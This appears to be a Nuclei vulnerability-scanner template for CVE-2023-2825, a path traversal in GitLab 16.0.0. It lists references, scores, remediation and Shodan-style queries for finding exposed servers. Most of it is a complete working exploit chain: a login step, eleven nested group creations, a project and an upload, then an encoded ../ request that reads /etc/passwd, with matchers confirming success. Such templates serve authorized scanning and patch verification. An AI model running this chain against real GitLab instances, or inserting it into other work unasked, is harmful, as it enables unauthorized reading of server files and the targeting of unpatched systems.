GitLab 16.0.0 - Path Traversal

id: CVE-2023-2825

info:
  name: GitLab 16.0.0 - Path Traversal
  author: DhiyaneshDk,rootxharsh,iamnoooob,pdresearch
  severity: high
  description: |
    An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups
  remediation: |
    Upgrade GitLab to a version that is not affected by the path traversal vulnerability (CVE-2023-2825).
  reference:
    - https://about.gitlab.com/releases/2023/05/23/critical-security-release-gitlab-16-0-1-released/
    - https://github.com/Occamsec/CVE-2023-2825
    - https://labs.watchtowr.com/gitlab-arbitrary-file-read-gitlab-cve-2023-2825-analysis/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2825
    - https://gitlab.com/gitlab-org/cves/-/blob/master/2023/CVE-2023-2825.json
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-2825
    cwe-id: CWE-22
    epss-score: 0.12203
    epss-percentile: 0.95384
    cpe: cpe:2.3:a:gitlab:gitlab:16.0.0:*:*:*:community:*:*:*
  metadata:
    verified: true
    max-request: 16
    vendor: gitlab
    product: gitlab
    shodan-query:
      - title:"Gitlab"
      - cpe:"cpe:2.3:a:gitlab:gitlab"
      - http.title:"gitlab"
    fofa-query: title="gitlab"
    google-query: intitle:"gitlab"
  tags: cve2023,cve,gitlab,lfi,authenticated,intrusive
variables:
  data: "{{rand_base(5)}}"

http:
  - raw:
      - |
        GET /users/sign_in HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /users/sign_in HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept: */*

        user%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&authenticity_token={{token_1}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept: */*

        group%5Bparent_id%5D=&group%5Bname%5D={{data}}-1&group%5Bpath%5D={{data}}-1&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-2&group%5Bpath%5D={{data}}-2&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-3&group%5Bpath%5D={{data}}-3&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-4&group%5Bpath%5D={{data}}-4&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-5&group%5Bpath%5D={{data}}-5&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-6&group%5Bpath%5D={{data}}-6&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-7&group%5Bpath%5D={{data}}-7&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-8&group%5Bpath%5D={{data}}-8&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-9&group%5Bpath%5D={{data}}-9&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-10&group%5Bpath%5D={{data}}-10&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-11&group%5Bpath%5D={{data}}-11&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        @timeout: 15s
        POST /projects HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        project%5Bci_cd_only%5D=false&project%5Bname%5D=CVE-2023-2825&project%5Bselected_namespace_id%5D={{namespace_id}}&project%5Bnamespace_id%5D={{namespace_id}}&project%5Bpath%5D=CVE-2023-2825&project%5Bvisibility_level%5D=20&project%5Binitialize_with_readme=1&authenticity_token={{token_2}}
      - |
        POST /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        X-CSRF-Token: {{x-csrf-token}}
        Content-Type: multipart/form-data; boundary=0ce2a9fbe06b6da89c138a35a1765ed6

        --0ce2a9fbe06b6da89c138a35a1765ed6
        Content-Disposition: form-data; name="file"; filename="{{randstr}}"

        {{randstr}}
        --0ce2a9fbe06b6da89c138a35a1765ed6--
      - |
        GET /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads/{{upload-hash}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    host-redirects: true

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 726f6f743a78
        encoding: hex

      - type: word
        part: header
        words:
          - application/octet-stream
          - etc%2Fpasswd
        condition: and

    extractors:
      - type: regex
        name: token_1
        group: 1
        regex:
          - name="authenticity_token" value="([A-Za-z0-9_-]+)"
        internal: true
        part: body

      - type: regex
        name: token_2
        group: 1
        regex:
          - name="csrf\-token" content="([A-Z_0-9a-z-]+)"
        internal: true
        part: body

      - type: regex
        name: parent_id
        group: 1
        regex:
          - href="\/groups\/new\?parent_id=([0-9]+)
        internal: true
        part: body

      - type: regex
        name: namespace_id
        group: 1
        regex:
          - ref="\/projects\/new\?namespace_id=([0-9]+)
        internal: true
        part: body

      - type: regex
        name: x-csrf-token
        group: 1
        regex:
          - const headers = \{"X\-CSRF\-Token":"([a-zA-Z-0-9_]+)"
        internal: true
        part: body

      - type: regex
        name: upload-hash
        group: 1
        regex:
          - '"url":"\/uploads\/([0-9a-z]+)\/'
        internal: true
        part: body
# digest: 4a0a00473045022100dfd3431d04aa76f4f656e43eb506273387a8299167937a29af634da664383762022043221d39d47a5c3aff4ea35ebd7ca48af5ba36ec2866494452f9b42702206196:922c64590222798bb761d5b6d8e72950